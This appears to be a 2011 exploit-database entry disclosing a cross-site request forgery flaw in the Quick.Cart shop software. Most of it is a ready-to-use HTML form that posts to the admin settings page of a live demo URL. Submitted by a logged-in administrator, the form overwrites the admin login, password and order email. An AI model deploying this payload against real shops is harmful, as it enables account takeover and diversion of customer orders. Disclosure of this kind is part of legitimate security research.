# Exploit Title:Quick Cart ~~>> XSRF Vuln.
# Download : http://opensolution.org/Quick.Cart/demo
# Date: 16.08.2011
# Author: Izām
# Note: Warning. The aim is not damaged. Information purposes
########################################
<form action=http://opensolution.org/Quick.Cart/demo/admin.php?p=settings-config method=post id=mainForm name=form onSubmit=return checkForm( this );>
<input type=submit value=Gonder name=sOption />
<input type=text name=login readonly=readonly value=Kullanici Adi size=40 class=input alt=simple />
<input type=text name=pass readonly=readonly value=Sifre size=40 class=input alt=simple />
<input type=text name=orders_email value=[email protected] size=40 class=input />
</td>
</form>